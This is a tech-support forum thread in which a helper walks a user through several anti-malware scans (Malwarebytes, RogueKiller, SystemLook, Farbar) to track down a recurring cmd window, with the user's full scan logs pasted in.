    E:\Lucas\pendrive\Pendrive\RegCure\RegCure Pro 3.1.6 (Mr7ech)\Crack (Mr7ech)\Regcurepro.exe    a variant of Win32/RegCure.A potentially unwanted application    cleaned by deleting

     

    Mbam

     

    Malwarebytes
    www.malwarebytes.com

    -Detalhes de registro-
    Data da análise: 18/09/17
    Hora da análise: 23:15
    Arquivo de registro: 5899b20e-9ce0-11e7-a0a5-40167eab023a.json
    Administrador: Sim

    -Informação do software-
    Versão: 3.2.2.2029
    Versão de componentes: 1.0.188
    Versão do pacote de definições: 1.0.2837
    Licença: Versão de Avaliação

    -Informação do sistema-
    Sistema operacional: Windows 7 Service Pack 1
    CPU: x64
    Sistema de arquivos: NTFS
    Usuário: LUCAS-PC\A

    -Resumo da análise-
    Tipo de análise: Análise Customizada
    Resultado: Concluído
    Objetos verificados: 463741
    Ameaças detectadas: 0
    (Nenhum item malicioso detectado)
    Ameaças em quarentena: 0
    (Nenhum item malicioso detectado)
    Tempo decorrido: 23 min, 54 seg

    -Opções da análise-
    Memória: Habilitado
    Inicialização: Habilitado
    Sistema de arquivos: Habilitado
    Arquivos compactados: Habilitado
    Rootkits: Habilitado
    Heurística: Habilitado
    PUP: Detectar
    PUM: Detectar

    -Detalhes da análise-
    Processo: 0
    (Nenhum item malicioso detectado)

    Módulo: 0
    (Nenhum item malicioso detectado)

    Chave de registro: 0
    (Nenhum item malicioso detectado)

    Valor de registro: 0
    (Nenhum item malicioso detectado)

    Dados de registro: 0
    (Nenhum item malicioso detectado)

    Fluxo de dados: 0
    (Nenhum item malicioso detectado)

    Pasta: 0
    (Nenhum item malicioso detectado)

    Arquivo: 0
    (Nenhum item malicioso detectado)

    Setor físico: 0
    (Nenhum item malicioso detectado)


    (end)


    @Murilo Beraldo

     

    Download RogueKiller by Tigzy and save it to your desktop.
    roguekiller.exe (x64) << link

    • Close all programs
    • Run RogueKiller.exe.
      ** Windows Vista, Windows 7, 8, 8.1 and Windows 10 users:
      Right-click the rogueKiller.exe file, then click Run as administrator.
    • When the EULA window appears, click Accept.
    • Select the SCAN tab
    • Click START SCAN
    • Wait until the scan finishes...
    • Click the OPEN REPORT button
    • Click the EXPORT TXT option and save it to the desktop as roguekiller.txt
    • Click OK and close RogueKiller.



    Remember to open the file and copy and paste its entire contents in your next reply.

    Here it is. And thank you for helping :D

     

    RogueKiller V12.11.16.0 (x64) [Sep 18 2017] (Free) por Adlice Software
    mail : http://www.adlice.com/contact/
    Feedback : https://forum.adlice.com
    Site : http://www.adlice.com/download/roguekiller/
    Blog : http://www.adlice.com

    Sistema Operacional : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
    Iniciou : Modo normal
    Usuário : A [Administrador]
    Started from : C:\Users\A\Desktop\RogueKiller_portable64.exe
    Modo : Escanear -- Data : 09/19/2017 19:19:55 (Duration : 00:12:58)

    ¤¤¤ Processos : 0 ¤¤¤

    ¤¤¤ Registro : 6 ¤¤¤
    [PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Internet Explorer\Main | Start Page : about:Tabs  -> Encontrado
    [PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Internet Explorer\Main | Start Page : about:Tabs  -> Encontrado
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 201.6.2.93 201.6.2.119 ([-][Brazil])  -> Encontrado
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DB90E8CF-DB50-4933-BA80-4CDA1B2D5A0D} | DhcpNameServer : 201.6.2.93 201.6.2.119 ([-][Brazil])  -> Encontrado
    [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Encontrado
    [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Encontrado

    ¤¤¤ Tarefas : 2 ¤¤¤
    [Suspicious.Path] \CIS_{15198508-521A-4D69-8E5B-B94A6CCFF805} -- C:\Users\A\AppData\Local\Temp\cis3929.exe (--PostUninstall {15198508-521A-4D69-8E5B-B94A6CCFF805}) -> Encontrado
    [Hj.Shortcut] \{BE9DAE43-E2E7-4DEF-8298-8EC212500AE6} -- "c:\program files (x86)\google\chrome\application\chrome.exe" (http://ui.skype.com/ui/0/7.18.0.112/pt/abandoninstall?page=tsMain) -> Encontrado

    ¤¤¤ Arquivos : 4 ¤¤¤
    [PUP.Gen1][Arquivo] C:\Users\A\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Popcorn Time.lnk [LNK@] C:\PROGRA~2\POPCOR~1\POPCOR~1.EXE -> Encontrado
    [Hidden.ADS][Stream] C:\ProgramData:961CD860F779A42E -> Encontrado
    [PUP.Gen1][Pasta] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Popcorn Time -> Encontrado
    [PUP.Gen1][Pasta] C:\Program Files (x86)\Popcorn Time -> Encontrado

    ¤¤¤ WMI : 0 ¤¤¤

    ¤¤¤ Arquivos de hosts : 0 [Too big!] ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Carregado) ¤¤¤

    ¤¤¤ Navegadores : 2 ¤¤¤
    [PUM.SearchEngine][Firefox:Config] j167jror.default : user_pref("browser.search.defaultenginename", "Google (avast)"); -> Encontrado
    [PUM.HomePage][Chrome:Config] Default [SecurePrefs] : session.startup_urls [http://www.hotmail.com/] -> Encontrado

    ¤¤¤ Verificação da MBR : ¤¤¤
    +++++ PhysicalDrive0: KINGSTON SV300S37A120G SCSI Disk Device +++++
    --- User ---
    [MBR] 7c11b1c00944ee3ae35c4ba780ff4434
    [BSP] 3ae37d265e3c199ca0c260edf3277be5 : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114370 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    User = LL2 ... OK

    +++++ PhysicalDrive1: WDC WD10EZEX-00BN5A0 SCSI Disk Device +++++
    --- User ---
    [MBR] 4a237e8e4f7e182b30e2c2cbbde01ca1
    [BSP] a932aeb9624341c5ca86f20fc7f7f8cc : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    User = LL2 ... OK

    So, I did that, and in fact I ran it several more times, because it kept detecting some changes in the registry (two, actually). When I get home today I'll use the computer again and check whether the problem shows up. Then I'll come back here with the answer.

     

    Thanks :D

    Edited by Murilo Beraldo

    It seems the cmd window with the error is still appearing :z

     

    I'm finishing a scan with RogueKiller to identify the items I mentioned before; I'll post it here shortly.

     

    MBAM detected nothing.

    cmd.png

    added 4 minutes later

    EDIT: Here it is

    It seems that every time I restart the computer and run a scan it finds these same 3

     

    RogueKiller V12.11.16.0 (x64) [Sep 18 2017] (Free) por Adlice Software
    mail : http://www.adlice.com/contact/
    Feedback : https://forum.adlice.com
    Site : http://www.adlice.com/download/roguekiller/
    Blog : http://www.adlice.com

    Sistema Operacional : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
    Iniciou : Modo normal
    Usuário : A [Administrador]
    Started from : C:\Users\A\Desktop\RogueKiller_portable64.exe
    Modo : Escanear -- Data : 09/20/2017 19:45:45 (Duration : 00:13:10)

    ¤¤¤ Processos : 0 ¤¤¤

    ¤¤¤ Registro : 2 ¤¤¤
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 201.6.2.93 201.6.2.119 ([-][Brazil])  -> Encontrado
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{DB90E8CF-DB50-4933-BA80-4CDA1B2D5A0D} | DhcpNameServer : 201.6.2.93 201.6.2.119 ([-][Brazil])  -> Encontrado

    ¤¤¤ Tarefas : 0 ¤¤¤

    ¤¤¤ Arquivos : 1 ¤¤¤
    [Hidden.ADS][Stream] C:\ProgramData:961CD860F779A42E -> Encontrado

    ¤¤¤ WMI : 0 ¤¤¤

    ¤¤¤ Arquivos de hosts : 0 [Too big!] ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Carregado) ¤¤¤

    ¤¤¤ Navegadores : 0 ¤¤¤

    ¤¤¤ Verificação da MBR : ¤¤¤
    +++++ PhysicalDrive0: KINGSTON SV300S37A120G SCSI Disk Device +++++
    --- User ---
    [MBR] 7c11b1c00944ee3ae35c4ba780ff4434
    [BSP] 3ae37d265e3c199ca0c260edf3277be5 : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114370 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    User = LL2 ... OK

    +++++ PhysicalDrive1: WDC WD10EZEX-00BN5A0 SCSI Disk Device +++++
    --- User ---
    [MBR] 4a237e8e4f7e182b30e2c2cbbde01ca1
    [BSP] a932aeb9624341c5ca86f20fc7f7f8cc : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    User = LL2 ... OK

    Edited by Murilo Beraldo


    @Murilo Beraldo

     

    None of the entries found by RogueKiller are problems. You can relax.

     

    Follow the procedures in the link below to show hidden folders.
    Windows XP/7/Vista: http://windows.microsoft.com/pt-br/windows/show-hidden-files#show-hidden-files=windows-7
    Windows 8/8.1/10: http://www.tecmundo.com.br/como-fazer/26558-windows-8-como-exibir-arquivos-e-extensoes-ocultos.htm

    Now download SystemLook.exe and save it to your desktop.
    http://jpshortstuff.247fixes.com/SystemLook_x64.exe

    *** Windows Vista, Windows 7, 8/8.1 or Windows 10 users: right-click the SystemLook.exe file, then click Run as administrator.

    Double-click SystemLook.exe. Select, copy and paste what is inside the CODE box into the tool's text box.

    :filefind
    Control.cpl
    control.cpl
    :folderfind
    FE-1.0.0.0
    :regfind
    Control.cpl
    control.cpl

    Click the Look button; when the scan finishes, a log will open. It is saved as SystemLook.txt on the desktop.

    Select, copy and paste the contents of this log in your next reply.

    Just to mess with me, the thing showed up right when the scan finished x-x

    I set it to show hidden files and extensions too. I also set it to show hidden Windows files.

     

    Here's the log

     

    SystemLook 30.07.11 by jpshortstuff
    Log created at 19:48 on 21/09/2017 by A
    Administrator - Elevation successful

    ========== filefind ==========

    Searching for "Control.cpl"
    No files found.

    Searching for "control.cpl"
    No files found.

    ========== folderfind ==========

    Searching for "FE-1.0.0.0"
    No folders found.

    ========== regfind ==========

    Searching for "Control.cpl"
    No data found.

    Searching for "control.cpl"
    No data found.

    -= EOF =-

    Edited by Murilo Beraldo


    @Murilo Beraldo

     

    Download Farbar Recovery Scan Tool from the link below and save it to your desktop.
    https://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/

    ** Windows Vista, Windows 7, 8/8.1 and Windows 10 users:
    Right-click the FRST64.EXE file, then click Run as administrator.
    Accept the agreement, then click the Scan button.

    Wait; when it finishes, the FRST.txt and Addition.txt logs will be saved on your desktop.

    Select, copy and paste the contents of FRST.txt in your next reply and attach Addition.txt

    FRST.txt

     

    Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 20-09-2017
    Executado por A (administrador) em LUCAS-PC (22-09-2017 19:03:06)
    Executando a partir de C:\Users\A\Desktop
    Perfis Carregados: A (Perfis Disponíveis: A)
    Platform: Windows 7 Professional Service Pack 1 (X64) Idioma: Português (Brasil)
    Internet Explorer Versão 11 (Navegador padrão: Chrome)
    Modo da Inicialização: Normal
    Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processos (Whitelisted) =================

    (Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
    (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\APRP\aprp.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
    (Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe
    (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe
    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
    (BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
    (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
    (Scarlet.Crush Productions) E:\Arquivos de Programas\Scarlet.Crush Productions\bin\ScpService.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
    (Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
    (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
    (PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
    (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
    (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
    (Microsoft Corporation) C:\Windows\System32\msiexec.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
    (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
    (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
    (Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
    (Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
    (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
    (Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
    (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Akamai Technologies, Inc.) C:\Users\A\AppData\Local\Akamai\netsession_win.exe
    (Akamai Technologies, Inc.) C:\Users\A\AppData\Local\Akamai\netsession_win.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe

    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13530184 2013-04-22] (Realtek Semiconductor)
    HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-04-11] (Intel Corporation)
    HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor)
    HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
    HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-02-21] (Intel Corporation)
    HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [1871344 2017-08-10] (Adobe Systems Inc.)
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [Akamai NetSession Interface] => C:\Users\A\AppData\Local\Akamai\netsession_win.exe [4673432 2014-10-29] (Akamai Technologies, Inc.)
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8722136 2016-06-01] (Piriform Ltd)
    Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, and it is a registry item, it will be removed or restored to default.)

    Hosts: There is more than one entry in Hosts. See the Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 201.6.2.93 201.6.2.119
    Tcpip\..\Interfaces\{61404789-C97D-4202-8464-A9A596FC93CD}: [NameServer] 8.8.8.8
    Tcpip\..\Interfaces\{DB90E8CF-DB50-4933-BA80-4CDA1B2D5A0D}: [DhcpNameServer] 201.6.2.93 201.6.2.119

    Internet Explorer:
    ==================
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-21-1444981709-1690395092-1683229413-1000 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
    BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO-x32: No Name -> {6F83220D-2200-1287-2249-17574CA92DB0}22202F76204E6F4578706C6F726572202F74205245475F44574F5244202F642031202F66 -> No File
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-26] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-01-28] (Oracle Corporation)
    BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-01-28] (Oracle Corporation)
    BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    Toolbar: HKLM - avast! WebRep - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
    Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2017-04-04] (Adobe Systems Incorporated)
    DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    Handler: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} -  No File

    FireFox:
    ========
    FF ProfilePath: C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default [2017-09-19]
    FF Homepage: Mozilla\Firefox\Profiles\j167jror.default -> about:home
    FF SearchPlugin: C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\searchplugins\google-avast.xml [2014-12-05]
    FF HKLM-x32\...\Firefox\Extensions: [amizade@technet.com] - C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\Mozilla.xpi
    FF Extension: (Mozilla Firefox Security) - C:\Users\A\AppData\Roaming\Mozilla\Firefox\Profiles\j167jror.default\Mozilla.xpi [2014-12-04] [not signed]
    FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension.15@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn
    FF Extension: (Adobe Acrobat DC - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn [2017-04-27]
    FF HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E886D}] - C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\cef\xpi => not found
    FF HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Firefox\Extensions: [{87F8774F-B485-47E2-A755-A40A8A5E8874}] - C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\abn\xpi => not found
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\buscape.xml [2015-05-07]
    FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mercadolivre.xml [2015-05-07]
    FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_27_0_0_130.dll [2017-09-14] ()
    FF Plugin: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2014-07-04] (Microsoft Corporation)
    FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
    FF Plugin: @wacom.com/wtPlugin,version=2.1.0.3 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2017-03-27] (Adobe Systems)
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_130.dll [2017-09-14] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.0.72 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-03-12] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-03-12] (Intel Corporation)
    FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-01-28] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-01-28] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2014-07-04] (Microsoft Corporation)
    FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
    FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2017-05-18] (NVIDIA Corporation)
    FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2017-05-18] (NVIDIA Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
    FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.3 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)
    FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2017-08-10] (Adobe Systems Inc.)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2017-03-27] (Adobe Systems)
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/abn -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_abn.dll [No File]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/cef -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_cef.dll [No File]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: gastecnologia.com.br/sf/cef64 -> C:\Users\A\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll [No File]
    FF Plugin HKU\S-1-5-21-1444981709-1690395092-1683229413-1000: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-12-25] (Wacom)

    Chrome: 
    =======
    CHR DefaultProfile: Default
    CHR Profile: C:\Users\A\AppData\Local\Google\Chrome\User Data\Default [2017-09-22]
